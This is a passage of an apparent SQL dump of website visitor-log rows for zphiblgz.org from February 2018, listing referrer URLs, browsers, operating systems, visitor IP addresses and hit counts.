nknown','','50.63.197.68','000',1,0),(23489,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','81.169.144.135','000',1,0),(23490,'2018-02-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.35','000',1,0),(23491,'2018-02-20','http://suzuki-metropolis.kiev.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(23492,'2018-02-20','https://zphiblgz.org','Firefox','Windows','58.0','','192.198.80.227','000',3,0),(23493,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',1,0),(23494,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.79','000',3,0),(23495,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.81','000',3,0),(23496,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.112','000',1,0),(23497,'2018-02-20','https://vzube.com/','MSIE','Unknown','6.0','','134.249.48.151','000',3,0),(23498,'2018-02-20','https://mtsguru.ru/','MSIE','Windows','6.0','','134.249.48.151','000',3,0),(23499,'2018-02-20','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.27','000',1,0),(23500,'2018-02-20','https://zphiblgz.org','Firefox','Windows','9.0.1','','208.80.194.35','000',1,0),(23501,'2018-02-20','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.35','000',1,0),(23502,'2018-02-20','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.32','000',1,0),(23503,'2018-02-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(23504,'2018-02-20','https://zphiblgz.org','Safari','Macintosh','11.0.1','','52.173.241.248','000',2,0),(23505,'2018-02-20','https://www.google.co.jp/','Safari','iPhone','11.0','','211.135.10.20','000',2,0),(23506,'2018-02-20','https://www.google.com/','Chrome','Macintosh','64.0.3282.167','','50.225.39.81','000',7,0),(23507,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','129.78.110.124','000',2,0),(23508,'2018-02-20','https://zphiblgz.org','Firefox','Windows','17.0','','95.181.182.230','000',2,0),(23509,'2018-02-20','https://zphiblgz.org','Firefox','Windows','40.1','','72.252.140.206','000',2,0),(23510,'2018-02-20','https://zphiblgz.org','Safari','iPhone','9.0','','60.1.123.66','000',1,0),(23511,'2018-02-20','https://zphiblgz.org','Safari','iPhone','9.0','','124.90.48.151','000',1,0),(23512,'2018-02-20','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.37','000',1,0),(23513,'2018-02-20','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.178','000',2,0),(23514,'2018-02-20','https://zphiblgz.org','Firefox','Macintosh','47.0','','82.208.146.208','000',2,0),(23515,'2018-02-20','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(23516,'2018-02-20','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.29','000',1,0),(23517,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.119','000',3,0),(23518,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.202','000',3,0),(23519,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.240','000',1,0),(23520,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.86','000',1,0),(23521,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.83','000',1,0),(23522,'2018-02-20','https://zphiblgz.org','Chrome','Windows','9.0.597.94','','208.80.194.27','000',1,0),(23523,'2018-02-20','https://zphiblgz.org','Safari','Macintosh','11.0.1','','52.165.166.139','000',1,0),(23524,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.121','000',4,0),(23525,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.26','000',1,0),(23526,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.205','000',3,0),(23527,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.25','000',1,0),(23528,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(23529,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.68','000',4,0),(23530,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',1,0),(23531,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.131','000',2,0),(23532,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.148','000',3,0),(23533,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',2,0),(23534,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.212','000',2,0),(23535,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.175','000',1,0),(23536,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.142','000',4,0),(23537,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.85','000',3,0),(23538,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.210','000',3,0),(23539,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',2,0),(23540,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.212','000',2,0),(23541,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.195','000',2,0),(23542,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.16','000',3,0),(23543,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.215','000',2,0),(23544,'2018-02-20','https://r.search.yahoo.com/_ylt=AwrBTzfPvYhav8EANWRx.9w4;_ylu=X3oDMTEyNmo4bTliBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjUyNzdfMQRzZWMDc3I-/RV=2/RE=1518939727/RO=10/RU=https%3a%2f%2fzphiblgz.org%2f/RK=2/RS=Ff1iv26.dHOtEwM1qWi_DFpyO9A-','Safari','iPhone','11.0','','173.69.187.98','000',10,0),(23545,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.37','000',3,0),(23546,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.243','000',2,0),(23547,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.144','000',1,0),(23548,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.240','000',4,0),(23549,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',3,0),(23550,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.84','000',1,0),(23551,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.55','000',2,0),(23552,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.83','000',1,0),(23553,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',2,0),(23554,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.19','000',2,0),(23555,'2018-02-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.173.241.248','000',2,0),(23556,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',3,0),(23557,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.204','000',2,0),(23558,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',1,0),(23559,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',2,0),(23560,'2018-02-20','https://www.google.com/search?q=lambda+gamma+zeta+chapter&gws_rd=ssl','MSIE','Windows','11.0','','172.58.185.146','000',5,0),(23561,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',2,0),(23562,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',3,0),(23563,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.91','000',1,0),(23564,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.205','000',1,0),(23565,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',1,0),(23566,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.19','000',1,0),(23567,'2018-02-20','https://zphiblgz.org','Edge','Windows','16.16299','','50.225.39.77','000',11,0),(23568,'2018-02-20','http://zphiblgz.org/','Chrome','Windows','32.0.1700.76','','195.22.127.67','000',3,0),(23569,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.123','000',1,0),(23570,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.216','000',1,0),(23571,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',2,0),(23572,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.89','000',3,0),(23573,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.213','000',1,0),(23574,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',1,0),(23575,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(23576,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',2,0),(23577,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.29','000',2,0),(23578,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.115','000',1,0),(23579,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.198','000',2,0),(23580,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.83','000',2,0),(23581,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.24','000',2,0),(23582,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.41','000',1,0),(23583,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.208','000',1,0),(23584,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.224.211','000',1,0),(23585,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.79','000',1,0),(23586,'2018-02-20','https://zphiblgz.org','Chrome','Macintosh','54.0.2840.98','','128.192.4.160','000',4,0),(23587,'2018-02-20','https://zphiblgz.org','MSIE','Windows','9.0','','213.239.205.118','000',2,0),(23588,'2018-02-20','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.94','','52.165.166.139','000',2,0),(23589,'2018-02-20','https://zphiblgz.org','Chrome','Windows','10.0.648.204','','209.95.165.6','000',2,0),(23590,'2018-02-20','https://zphiblgz.org','Safari','iPhone','11.0','','204.126.132.241','000',6,0),(23591,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.125','000',1,0),(23592,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.74','000',1,0),(23593,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.231','000',1,0),(23594,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',4,0),(23595,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.53','000',5,0),(23596,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.85','000',2,0),(23597,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.177','000',1,0),(23598,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.218','000',2,0),(23599,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.26','000',2,0),(23600,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',1,0),(23601,'2018-02-20','https://www.google.com/','Chrome','Windows','64.0.3282.167','','134.192.135.254','000',11,0),(23602,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',2,0),(23603,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.213','000',1,0),(23604,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',2,0),(23605,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',1,0),(23606,'2018-02-20','https://zphiblgz.org','Firefox','Windows','57.0','','52.165.166.139','000',2,0),(23607,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.193','000',2,0),(23608,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.24','000',4,0),(23609,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.204','000',2,0),(23610,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.113','000',1,0),(23611,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.120','000',1,0),(23612,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.230','000',1,0),(23613,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.185','000',1,0),(23614,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',1,0),(23615,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.215','000',1,0),(23616,'2018-02-20','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.185','000',5,0),(23617,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',3,0),(23618,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.176','000',1,0),(23619,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.136','000',3,0),(23620,'2018-02-20','https://kazka.ru/','Opera','Windows','8.00','','37.115.112.228','000',3,0),(23621,'2018-02-20','https://zphiblgz.org','CATExplorador','Unknown','1.0beta','','45.32.151.39','000',3,0),(23622,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.21','000',2,0),(23623,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',3,0),(23624,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',3,0),(23625,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.91','000',2,0),(23626,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.114','000',3,0),(23627,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.88','000',1,0),(23628,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.76','000',1,0),(23629,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(23630,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.202','000',1,0),(23631,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.149','000',1,0),(23632,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',1,0),(23633,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.221','000',2,0),(23634,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',2,0),(23635,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.86','000',1,0),(23636,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.245','000',2,0),(23637,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.154','000',2,0),(23638,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.67','000',2,0),(23639,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.89','000',1,0),(23640,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.83','000',1,0),(23641,'2018-02-20','https://zphiblgz.org/scholarship/','MSIE','Windows','11.0','','73.133.120.5','000',3,0),(23642,'2018-02-20','https://zphiblgz.org/','MSIE','Windows','9.0','','24.251.24.40','000',2,0),(23643,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.27','000',3,0),(23644,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.113','000',2,0),(23645,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.142','000',3,0),(23646,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.54','000',3,0),(23647,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',1,0),(23648,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.21','000',2,0),(23649,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',1,0),(23650,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.193','000',2,0),(23651,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.65','000',1,0),(23652,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.116','000',1,0),(23653,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.151','000',1,0),(23654,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.212','000',3,0),(23655,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.13','000',1,0),(23656,'2018-02-20','http://komukc.com.ua/','MSIE','Windows','5.5','','37.115.112.228','000',3,0),(23657,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(23658,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.54','000',3,0),(23659,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.214','000',1,0),(23660,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(23661,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',1,0),(23662,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.116','000',1,0),(23663,'2018-02-20','https://zphiblgz.org','Safari','iPhone','11.0','','166.216.165.88','000',1,0),(23664,'2018-02-20','http://zphiblgz.org/scholarship/','Safari','iPhone','11.0','','107.77.203.96','000',1,0),(23665,'2018-02-20','http://transit.in.ua/','Opera','Windows','8.01','','46.118.116.121','000',1,0),(23666,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.180','000',1,0),(23667,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.205','000',1,0),(23668,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(23669,'2018-02-20','https://zphiblgz.org','Firefox','Windows','40.1','','176.63.30.55','000',2,0),(23670,'2018-02-20','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','52.165.166.139','000',1,0),(23671,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(23672,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',2,0),(23673,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.71','000',1,0),(23674,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.80.119','000',1,0),(23675,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.153','000',2,0),(23676,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.143','000',1,0),(23677,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.135','000',1,0),(23678,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.149','000',1,0),(23679,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.156','000',1,0),(23680,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.39','000',1,0),(23681,'2018-02-20','http://komp-pomosch.ru/','MSIE','Windows','6.0','','178.137.16.45','000',3,0),(23682,'2018-02-20','https://www.google.com/','Chrome','Chrome OS','63.0.3239.140','','96.242.35.105','000',2,0),(23683,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.201','000',1,0),(23684,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.20','000',2,0),(23685,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.19','000',2,0),(23686,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.209','000',1,0),(23687,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.12','000',1,0),(23688,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',1,0),(23689,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.134','000',2,0),(23690,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',1,0),(23691,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.218','000',2,0),(23692,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.32','000',1,0),(23693,'2018-02-20','https://zphiblgz.org','Firefox','Windows','40.1','','45.221.223.96','000',2,0),(23694,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.114','000',1,0),(23695,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.72','000',1,0),(23696,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.168','000',1,0),(23697,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.39','000',1,0),(23698,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.132','000',2,0),(23699,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.77','000',1,0),(23700,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.74','000',2,0),(23701,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.145.153','000',1,0),(23702,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.35','000',1,0),(23703,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.138','000',1,0),(23704,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.116','000',3,0),(23705,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',2,0),(23706,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.115','000',1,0),(23707,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.129','000',4,0),(23708,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.122','000',2,0),(23709,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.177','000',1,0),(23710,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.187','000',1,0),(23711,'2018-02-20','https://www.google.com/','Safari','iPhone','11.0','','69.140.29.93','000',8,0),(23712,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.124','000',1,0),(23713,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',2,0),(23714,'2018-02-20','https://zphiblgz.org','Firefox','Macintosh','33.0','','23.236.148.54','000',2,0),(23715,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.217','000',3,0),(23716,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.203','000',3,0),(23717,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(23718,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',1,0),(23719,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.125','000',1,0),(23720,'2018-02-20','https://www.google.com/','Chrome','Windows','64.0.3282.167','','73.180.242.128','000',2,0),(23721,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.20','000',1,0),(23722,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.224','000',1,0),(23723,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.147','000',1,0),(23724,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.149','000',2,0),(23725,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.192','000',1,0),(23726,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.213','000',1,0),(23727,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.73','000',1,0),(23728,'2018-02-20','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',1,0),(23729,'2018-02-20','https://zphiblgz.org','Firefox','Windows','58.0','','76.100.44.13','000',4,0),(23730,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.179','000',7,0),(23731,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',2,0),(23732,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',1,0),(23733,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.214','000',1,0),(23734,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',2,0),(23735,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.223','000',1,0),(23736,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.29','000',1,0),(23737,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.126','000',2,0),(23738,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(23739,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.23','000',1,0),(23740,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',1,0),(23741,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',1,0),(23742,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.197','000',2,0),(23743,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.95.28','000',1,0),(23744,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.100','000',2,0),(23745,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.92.69','000',2,0),(23746,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.88.3','000',2,0),(23747,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.91.213','000',1,0),(23748,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.112','000',1,0),(23749,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',1,0),(23750,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.235','000',1,0),(23751,'2018-02-20','http://zphiblgz.org/','Chrome','Windows','58.0.3029.110','','188.165.4.128','000',2,0),(23752,'2018-02-20','https://zphiblgz.org','Safari','Macintosh','11.0.2','','68.134.0.176','000',7,0),(23753,'2018-02-20','http://truebeauty.cc/','MSIE','Windows','6.0','','46.118.116.121','000',1,0),(23754,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.185.117','000',2,0),(23755,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',1,0),(23756,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','150.95.184.237','000',2,0),(23757,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.188','000',1,0),(23758,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.43','000',1,0),(23759,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(23760,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.126','000',1,0),(23761,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',3,0),(23762,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.118','000',1,0),(23763,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.218','000',2,0),(23764,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',1,0),(23765,'2018-02-20','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.213','000',1,0),(23766,'2018-02-21','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',5,0),(23767,